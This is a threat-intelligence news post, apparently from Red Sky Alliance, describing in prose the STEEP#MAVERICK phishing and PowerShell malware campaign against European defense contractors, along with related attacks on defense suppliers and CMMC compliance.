A cyberattack campaign, potentially bent on cyber espionage, is highlighting the increasingly sophisticated nature of cyber threats targeting defense contractors in the US and elsewhere. The covert campaign, which researchers detected and are tracking as STEEP#MAVERICK, has hit multiple weapons contractors in Europe in recent months, including potentially a supplier to the US F-35 Lightning II fighter aircraft program.
What makes the campaign noteworthy, according to investigators, is the overall attention the attacker has paid to operations security (OpSec) and to ensure their malware is hard to detect, difficult to remove, and challenging to analyze. The PowerShell-based malware stager used in the attacks has featured an array of interesting tactics, persistence methodology, counter-forensics, and layers upon layers of obfuscation to hide its code.[1]
The STEEP#MAVERICK campaign appears to have launched in late summer 2022, with attacks on two high-profile defense contractors in Europe. Like many campaigns, the attack chain began with a spear-phishing email that contained a compressed (.zip) file with a shortcut (.lnk) file to a PDF document purportedly describing company benefits. Researchers described the phishing email as being similar to one it had encountered in a campaign earlier this year involving North Korea's APT37 (aka Konni) threat group.
See: https://redskyalliance.org/xindustry/konni-malware
When the .lnk file is executed, it triggers what is described as a "rather large and robust chain of stagers," each written in PowerShell and featuring as many as eight obfuscation layers. The malware also features extensive anti-forensic and counter-debugging capabilities which include monitoring a long list of processes that could be used to look for malicious behavior. The malware is designed to disable logging and bypass Windows Defender. It uses several techniques to persist on a system, including embedding itself in the system registry, embedding itself as a scheduled task, and creating a startup shortcut on the system.
The number and variety of anti-analysis and anti-monitoring checks on the malware have been unusual. So, too, is a large number of obfuscation layers for payloads and the malware's attempts to substitute or generate new custom command-and-control (C2) stager payloads in response to analysis attempts: Some obfuscation techniques, such as using PowerShell get-alias to perform [the invoke-expression cmdlet] are very rarely seen. The malicious activities were performed in an OpSec-aware manner with different types of anti-analysis checks and evasion attempts throughout the attack at a relatively high operational tempo with custom payloads injected.
Based on the details of the attack, one takeaway for other organizations is to pay extra attention to monitoring their security tools. Organizations should ensure security tools work as expected and avoid relying on a single security tool or technology to detect threats.
The STEEP#MAVERICK campaign is only the latest in a growing number that has targeted defense contractors and suppliers in recent years. Many of these campaigns have involved state-backed actors operating out of China, Russia, North Korea, and other countries.
In January 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert warning of Russian state-sponsored actors targeting so-called cleared defense contractors (CDCs) in attacks designed to steal sensitive US defense information and technology. The CISA alert described the attacks as targeting a wide swath of CDCs, including those involved in developing combat systems, intelligence and surveillance technologies, weapons and missile development, and combat vehicle and aircraft design.
In February 2022, researchers at Palo Alto Networks reported on at least four US defense contractors being targeted in a campaign to distribute a lifeless, socketless backdoor called SockDetour. The attacks were part of a broader campaign that the security vendor had investigated along with the National Security Agency in 2021 involving a Chinese advanced persistent group that targeted defense contractors and organizations in multiple other sectors.
Adding to the concerns over the rising volume of cyberattacks is the relative vulnerability of many defense contractors, despite having secrets that should be closely guarded. Recent research that Black Kite conducted into the security practices of the top 100 US defense contractors showed that nearly a third (32%) are vulnerable to ransomware attacks. This is because of factors like leaked or compromised credentials and weak practices in areas such as credential management, application security, and Security Sockets Layer/Transport Layer Security. Seventy-two percent of the respondents in the Black Kite report have experienced at least one incident involving a leaked credential.
The US Department of Defense, in conjunction with industry stakeholders, has developed a set of cybersecurity best practices for military contractors to use to protect sensitive data. Under the DoD's Cybersecurity Maturity Model Certification program, defense contractors are required to implement these practices and get certified as having them to be able to sell to the government. The bad news? The rollout of the program has been delayed.
Need help with NIST 800-171 or CMMC compliance, please visit: https://www.wapacklabs.com/compliance
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225 or feedback@wapacklabs. com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www. redskyalliance. org/
- Website: https://www. wapacklabs. com/
- LinkedIn: https://www. linkedin. com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989
[1] https://www.darkreading.com/attacks-breaches/sophisticated-cyberattack-campaign-targets-defense-contractors
Comments